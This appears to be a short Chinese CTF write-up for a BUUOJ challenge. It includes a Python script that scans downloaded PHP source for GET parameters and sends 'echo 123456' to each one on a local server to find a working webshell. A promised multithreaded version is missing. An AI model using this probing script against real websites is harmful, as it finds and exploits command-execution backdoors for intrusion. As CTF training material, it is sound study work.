簡介
原題復現:
考察知識點:python代碼編寫能力。。。
線上平台:https://buuoj.cn(北京聯合大學公開的CTF平台) 榆林學院內可使用信安協會內部的CTF訓練平台找到此題
簡介
頁面提示有源碼可以下載,直接拼接URL www.tar.gz
下載后發現一堆php 初步考慮就是有考察根腳本編寫有關
打開代碼發現這些 有get、pos 還有var_dump() 每個頁面都有很多看WP說這是shell 因為很多都不能用所以要編寫一個能檢測利用的py
v1.0版本(速度太慢)
import re import os import requests files = os.listdir('src/') #獲取路徑下的所有文件 reg = re.compile(r'(?<=_GET\[\').*(?=\'\])') #設置正則 for i in files: #從第一個文件開始 url = "http://127.0.0.1/src/" + i f = open("src/"+i) #打開這個文件 data = f.read() #讀取文件內容 f.close() #關閉文件 result = reg.findall(data) #從文件中找到GET請求 for j in result: #從第一個GET參數開始 payload = url + "?" + j + "=echo 123456" ##嘗試請求次路徑,並執行命令 print(payload) html = requests.get(payload) if "123456" in html.text: print(payload) exit(1)
v2.0(加了多線程)
簡介
1
簡介